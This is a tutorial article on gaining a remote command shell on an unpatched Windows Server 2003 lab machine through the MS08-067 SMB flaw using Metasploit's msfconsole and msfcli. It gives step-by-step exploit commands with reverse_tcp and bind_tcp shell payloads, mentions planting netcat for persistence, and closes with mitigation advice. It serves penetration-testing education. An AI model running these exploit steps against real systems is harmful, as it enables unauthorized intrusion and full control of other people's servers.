Exploiting Windows Server Reverse Shell

This article demystifies the remote shell accesses by exploitation of unpatched Windows 2003 Server vulnerabilities and taking complete control over the target remote computers, which is in fact, a complex and difficult undertaking.

This paper is intended to explain several Metasploit approaches to exploit a vulnerable Windows 2003 Server operating system, especially through msfconsole and msfcli module's and demonstrates the access of the target computer in a comprehensive hacking life-cycle manner. Metasploit is quite useful in penetration testing, in terms of detecting a vulnerability in the target Windows 2003 operating system as well as for exploiting its vulnerabilities. Metasploit could be utilized by both offensive and defensive professionals. Exploitation is about identifying a system's potential exposures and exploiting its weaknesses. We used nmap and Metasploit to identify potentially vulnerable services. From there we launched an exploit that gave us access to a system. We shall begin in this paper by covering the basics of exploitation execution using msfconsole and msfcli and compromising a target based on a discovered vulnerability.

Prerequisite

The researcher should be quite handy with operating Metasploit commands and be familiar with configuring several securities settings such as firewall, port configuration and so on in the Windows 2003 operating system. Moreover, the user machine must be configured with the following tools:

  • Backtrack 5 or Kali Linux
  • Metasploit Modules (msfconsole)
  • Windows 2003 Server

Scanning Target

Windows 2003 Server is still being used in several organizations to manipulate web servers, database server directory servers, FTP servers and mail servers but unfortunately running with several vulnerabilities that easily attract the vicious hacker for unauthorized penetration. The question is, how does the hacker exploit an unpatched operating system, in fact the modus operandi of illicit infiltration. In this process, It is first necessary to identify the target machine status for hackers, whether it is live or down during the exploitation. If the target is live then port scanning should be done that determines the status of all TCP and UDP ports, whether they are open or closed on the target machines. In other words, an open port is a network service such as FTP, HTTPS, POP and SMB listening on the port. If a network service is vulnerable then the attacker might be able to use that information to speed up the vulnerability analysis process.

We can encounter the port scanning method by the use of one of the special tools, for instance NMAP or Metasploit itself. NMAP is available in many flavors and in fact is a built-in vulnerability assessment tool of backtrack or kali Linux and is directly run in a command shell and generally, asks the target IP address or DNS name as a parameter. However, there are plenty of services running on a specific computer but here we are scanning the target machine to discover specific running services such as FTP, HTTP, POP and SMB as in the following:

running services
We can easily conclude from the previous output that a FTP, HTTP and SMB service is running on the target machine and in fact, they are not behind a firewall. So, we could penetrate that computer by exploiting these open services.

We can also enumerate the open services on a target computer using Metasploit port scanning exploits itself. In this odyssey, run the msfconsole and first search the available port scanning exploits modules in the msfconsole as in the following.

msf > search portscan

search portscan

The Metasploit has a couple of port scanning exploits and offers several scanning methods, especially SYN, XMAS, ACK scan. Therefore, we proceed with the SYN scanning method. So choose the port scanning exploit by the use of a command as in the following:

msf > use scanner/portscan/syn

Every exploit has a specific option or parameters that can be displayed by showing an options command as in the following:

msf > show options

The show options method displays the couple of corresponding exploit parameters, but we are only interested in the RHOSTS and THREAD options, that ask for the target computer IP address and the number of threads to be run as in the following:

show options

Finally launch the port scanning exploit using the run command as in the following:

msf > run

Note that this exploit requires the pcaprub module to be installed first in the Metasploit in order to scan the open port on the target computer. We can configure this as in the following:

msf run

Finally run the exploit using the run command and it shall produce the list of open ports on the target computer as in the following:

target computer

Exploiting Vulnerability

The exploit will only execute, whereas the target host has the vulnerability that still remains unpatched. Metasploit isn't particularly suited for telling you what vulnerabilities a host has. Hence you would need to use a specific vulnerability scanner. Alternatively, if your port scanner shows a specific port open, you can try all exploits for that specific port and see whether anyone has successfully carried it out or not.

The forthcoming demonstration regarding accessing the remote shell, involves exploiting the common MS08-067 vulnerability especially found on the Windows Server 2003 and Windows XP operating systems. We'll use Metasploit to get a remote command shell running on the unpatched Windows Server 2003 machine. Metasploit can pair any Windows exploit with any Windows payload such as bind or reverse TCP. So, we can choose the MS08-067 vulnerability to exploit or open a command shell as well as we can create an administrator account and start a remote VNC session kind of stuff on the victim computer. This vulnerability can be denied the hacker by patching the operating system, or by enabling the firewall to filter unwanted traffic and having installed an anti-virus with the latest signatures.

Remote Shell Access

We shall exploit the SMB (port 445) vulnerability of the target computer where the Windows 2003 Server is running. There is numerous ways to access the Reverse shell (command prompt) of the target but we shall encounter it with msfconsole and msfcli to achieve the objective.

Msfconsole

First open the msfconsole. To access "msfconsole", go to Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework| Msfconsole or use the terminal to execute the following commands:

# cd /pentest/exploits/framework3/
# ./msfconsole


Thereafter, it is mandatory to have the comprehensive information about a specific exploit, for example its full name, that is in fact, a complex task. So, there is an another to way to eliminate this problem. As we know we are exploiting the SMB port vulnerability, so it is obvious to have a SMB related exploit in our pocket. The best way to search the exploit with the SMB keyword is as in the following:

msf > search smb

This command would display all the exploits that have especially, the SMB keyword. We can get the information regarding any exploit as in the following:

msf > info windows/smb/ms08_067_netapi

After having confirmed that the aforesaid exploit fulfills our needs, we therefore, pick it up for use as in:

msf > use windows/smb/ms08_067_netapi

This exploit must mandate some parameter configuration in which the RHOST options is the prime property of this exploit that shall specify the target computer IP address. We can set the RHOST as in the following:

msf > set RHOST 192.168.40.132

set RHOST

After using the exploit and setting its option, we need to set the payload that specifies the precise objective, for instance reverse shell access. We can enumerate the payloads related to a specific exploit using this command:

msf > show payloads

Since we are committed to accessing the remote computer shell, so pick reverse_tcp payload and consume it as in the following:

msf > set payload windows/shell/reverse_tcp

Again, configure its parameter such as LHOST that is the IP address where from the exploitation is executing as in the following:

msf > set LHOST 192.168.40.129

set LHOST

Everything has been configured, such as RHOST, LHOST and automatic target up until now. So it is time to check whether or not this exploit would penetrate the target computer. We can confirm with vulnerable status using the check command as in the following:

vulnerable status

This command shows the status that the SMB exploit is working successfully and the target computer is vulnerable. Finally, launch or execute the exploit using the following command:

msf > exploit

The moment we run this command, the exploit penetrates the remote computer and we get the access of its command prompt as well as it is showing, which operating system is running on the target side as in the following:

exploit

Here, we can manipulate the remote computer shell to suit our needs, for instance enumerate the directory list, remove or create new files and so on without being seen by the actual user as in the following.

directory list

We have exploited the port 445 of the target computer, so we can confirm the communication socket created over the target computer using the netstat command as in the following:

listing

Msfcli (Command Line)

To open “msfcli", go to Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework| Msfcli or use the terminal to execute the following commands:

# cd /pentest/exploits/framework3/
# ./msfconsole

The msfcli has less functionality and is a bit complex rather than msfconsole, but could exploit the target in just one segment of commands. The exploit names and options are likely to be the same as the Metasploit console, but the mode values are unique to the CLI as in the following:

Msfcli

# ./msfcli exploit/windows/smb/ms08_067_netapi

Here, we are employing them a little bit differently to exploit in msfconsole rather than earlier, in order to access the Windows server computer remote shell. However, place the exploit name right after. /msfcli and place "O" that specifies the options related to this exploit as in the following:

rhost

By default, this exploit leaves the RHOST option blank, so set the remote computer IP using the following command:

# ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132

Now, we need to configure the payloads, hence placing "P" after the IP address would show the associated payloads lists as in the following:

netapi RHOST

This time, we are choosing bind_tcp payload to get the remote shell where the local computer IP address does not need to be configured. Put the payload name and show its option using "O" again as in the following:

# ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132 PAYLOAD=windows/shell/bind_tcp

bind tcp

Here, we don't need to set any options, just execute the exploit finally by placing "E" after the payload name as in the following:

# ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132 PAYLOAD=windows/shell/bind_tcp E

If the target is vulnerable to SMB services than this exploit is executed successfully via Metasploit as in the following:

Metasploit

And we will successfully obtain the full access to the target Windows 2003 Server computer command shell. Such exploitation of these unpatched vulnerabilities leads the Windows 2003 system into severe danger because a database server (SQL), mail server (SMTP), File Server, FTP Server and web server (IIS) are typically operated from here. Hackers are now able to do any administrative operations and be destructive in any manner, such as deleting files, directories, plant unsolicited malware in the form of netcat to maintain future access as in the following:

malware

Mitigation

So, we have seen how easy it is for a hacker to exploit an unpatched vulnerability of the Windows 2003 OS using Metasploit. The security personell could protect the server from such attacks by ensuring the following configurations at the server side:

  • Disable all redundant service
  • Always enable Firewall
  • Configure IDS/IPS at server-side
  • Configure DMZ for critical resource (IIS, FTP Server, Database)
  • Use a powerful anti-virus with the latest threat signature database
  • Patch operating system with the latest updates

Synopsis

This article demystified the remote shell access by exploiting unpatched Windows 2003 Server vulnerabilities and taking complete control over target remote computers, that is in fact, one of the complex and difficult undertakings. We have come to an understanding of operating the Metasploit amazing modules Msfconsole and Msfcli, that simplifies things by providing a consistent interface for exploits and concedes you to use your optimal payload with your elect exploit. We have been confronted with various commands of msfconsole and learned one bunch of the exploitation process using msfcli too.